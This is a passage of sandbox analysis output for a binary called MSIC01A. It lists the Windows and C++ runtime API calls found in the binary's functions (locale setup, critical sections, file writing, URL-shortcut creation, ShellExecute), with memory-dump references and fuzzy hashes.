                                                                                                                                                                          • Part of subcall function 00F52C4E: EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                          • Part of subcall function 00F52C4E: LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                          • Part of subcall function 00F52C4E: RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 325507722-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F5011D
                                                                                                                                                                        • collate.LIBCPMT ref: 00F50126
                                                                                                                                                                          • Part of subcall function 00F4EDF2: __EH_prolog3_GS.LIBCMT ref: 00F4EDF9
                                                                                                                                                                          • Part of subcall function 00F4EDF2: __Getcoll.LIBCPMT ref: 00F4EE5D
                                                                                                                                                                        • __Getcoll.LIBCPMT ref: 00F5016C
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50180
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50195
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F501D3
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F501E6
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5022C
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50260
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5031B
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5032E
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5034B
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50368
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50385
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F502BD
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                          • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                        • numpunct.LIBCPMT ref: 00F503C4
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F503D4
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50418
                                                                                                                                                                          • Part of subcall function 00F36330: LocalAlloc.KERNEL32(00000040,?,00F40E04,00000020,?,?,00F39942,00000000,72A902E8,?,?,?,?,00F750DD,000000FF), ref: 00F36336
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F5042B
                                                                                                                                                                        • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F50448
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00F3667E
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366D7
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366E2
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00F366FE
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F367DB
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F367E7
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00F749E5), ref: 00F3682F
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F3684A
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00F749E5), ref: 00F36867
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F36891
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00F368D8
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00F3692A
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00F749E5,000000FF), ref: 00F3695C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                                                                                                                        • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                                        • API String ID: 2199533872-3004881174
                                                                                                                                                                        • Opcode ID: 8cc433a9c9aea2c60e693013b7d88818d670c67dda4114a8b657af49fcd0a51d
                                                                                                                                                                        • Instruction ID: c9d604e0b268398b842c852dd607f156e5240a35f326310439f8eebfaeb73a52
                                                                                                                                                                        • Opcode Fuzzy Hash: 8cc433a9c9aea2c60e693013b7d88818d670c67dda4114a8b657af49fcd0a51d
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BB12571D04249AFEB20DF64CC86BEFBBB5AF05720F108129E504EB2C1DB749A48D7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00F8DD3C,00000FA0,?,?,00F52B6A), ref: 00F52B98
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00F52B6A), ref: 00F52BA3
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00F52B6A), ref: 00F52BB4
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F52BC6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F52BD4
                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00F52B6A), ref: 00F52BF7
                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(00F8DD3C,00000007,?,?,00F52B6A), ref: 00F52C13
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00F52B6A), ref: 00F52C23
                                                                                                                                                                        Strings
                                                                                                                                                                        • kernel32.dll, xrefs: 00F52BAF
                                                                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F52B9E
                                                                                                                                                                        • SleepConditionVariableCS, xrefs: 00F52BC0
                                                                                                                                                                        • WakeAllConditionVariable, xrefs: 00F52BCC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                        • API String ID: 2565136772-3242537097
                                                                                                                                                                        • Opcode ID: 747470fac7e550bb4e4f3f8e34fbba6116a2e7581603e1e1347cb9e959ee1d51
                                                                                                                                                                        • Instruction ID: 5f3c1c3c5ad97a37938eb315523f08950e66c4572684d0d66557e95ba1cabadb
                                                                                                                                                                        • Opcode Fuzzy Hash: 747470fac7e550bb4e4f3f8e34fbba6116a2e7581603e1e1347cb9e959ee1d51
                                                                                                                                                                        • Instruction Fuzzy Hash: AB01B572A54315ABD6213F75AC0CE667B689F827627014911FE08D22E0EBB4C845FB63
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 00F55DAC
                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00F55DCE
                                                                                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 00F55EDD
                                                                                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 00F55FAF
                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00F56033
                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00F5604E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                        • API String ID: 2123188842-393685449
                                                                                                                                                                        • Opcode ID: 61be372a432dd627ba8a607e41589dab0fb3af56ef2fb2074da84d34755e732d
                                                                                                                                                                        • Instruction ID: 97e20e11d47c986da3672bf359803c85ed80c8da7a2a197d9fcc9583a45af02c
                                                                                                                                                                        • Opcode Fuzzy Hash: 61be372a432dd627ba8a607e41589dab0fb3af56ef2fb2074da84d34755e732d
                                                                                                                                                                        • Instruction Fuzzy Hash: 13B1AE32C00609EFCF18DFA4C8A19AEB7B5FF14722F144059EE15AB212D734DA59EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,72A902E8,?,?,?), ref: 00F342D2
                                                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,72A902E8,?,?,?), ref: 00F342F3
                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,72A902E8,?,?,?), ref: 00F34326
                                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,72A902E8,?,?,?), ref: 00F34337
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34355
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34371
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F34399
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F343B5
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F343D3
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,72A902E8,?,?,?), ref: 00F343EF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandle$Process$OpenTimes
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1711917922-0
                                                                                                                                                                        • Opcode ID: 4486db02ea1f50f58e70fb355ea1861e0971b825910253914ed70fa3f40d4678
                                                                                                                                                                        • Instruction ID: 82ebb737f07b9d010b3bc32882871e1815436d636fe440871af8564dce385893
                                                                                                                                                                        • Opcode Fuzzy Hash: 4486db02ea1f50f58e70fb355ea1861e0971b825910253914ed70fa3f40d4678
                                                                                                                                                                        • Instruction Fuzzy Hash: BB517C70E01218EBDB10DF99D984BEEBBB8FF49724F244219E914B72C0C7746D05ABA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4BBC4
                                                                                                                                                                          • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                        • API String ID: 1538362411-2891247106
                                                                                                                                                                        • Opcode ID: e007a82690e584713a79c9eb97976cfcf44894785c86d65cb3cdfc8714a37dc4
                                                                                                                                                                        • Instruction ID: e6abb3e4fd18c136239eabd5c1276cf6818dfd4b1aecbc5c046de47add80a0fe
                                                                                                                                                                        • Opcode Fuzzy Hash: e007a82690e584713a79c9eb97976cfcf44894785c86d65cb3cdfc8714a37dc4
                                                                                                                                                                        • Instruction Fuzzy Hash: 41B1907290410AABDF19DFA8CD65EFE3FB9EB44324F044119FE0AA2252D731DA11EB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F50CA4
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                        • API String ID: 1383202999-2891247106
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4BF85
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                        • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                        • API String ID: 1383202999-2891247106
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4855C
                                                                                                                                                                        • _Maklocstr.LIBCPMT ref: 00F485C5
                                                                                                                                                                        • _Maklocstr.LIBCPMT ref: 00F485D7
                                                                                                                                                                        • _Maklocchr.LIBCPMT ref: 00F485EF
                                                                                                                                                                        • _Maklocchr.LIBCPMT ref: 00F485FF
                                                                                                                                                                        • _Getvals.LIBCPMT ref: 00F48621
                                                                                                                                                                          • Part of subcall function 00F41CD4: _Maklocchr.LIBCPMT ref: 00F41D03
                                                                                                                                                                          • Part of subcall function 00F41CD4: _Maklocchr.LIBCPMT ref: 00F41D19
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                        • API String ID: 3549167292-2658103896
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::locale::_Init.LIBCPMT ref: 00F39763
                                                                                                                                                                          • Part of subcall function 00F40C94: __EH_prolog3.LIBCMT ref: 00F40C9B
                                                                                                                                                                          • Part of subcall function 00F40C94: std::_Lockit::_Lockit.LIBCPMT ref: 00F40CA6
                                                                                                                                                                          • Part of subcall function 00F40C94: std::locale::_Setgloballocale.LIBCPMT ref: 00F40CC1
                                                                                                                                                                          • Part of subcall function 00F40C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00F40D17
                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00F3978A
                                                                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F397F0
                                                                                                                                                                        • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00F3984A
                                                                                                                                                                          • Part of subcall function 00F3F57A: __EH_prolog3.LIBCMT ref: 00F3F581
                                                                                                                                                                          • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F5C8
                                                                                                                                                                          • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F620
                                                                                                                                                                          • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F654
                                                                                                                                                                          • Part of subcall function 00F3F57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00F3F6A8
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,?,00F854B1,00000000), ref: 00F399BF
                                                                                                                                                                        • __cftoe.LIBCMT ref: 00F39B0B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
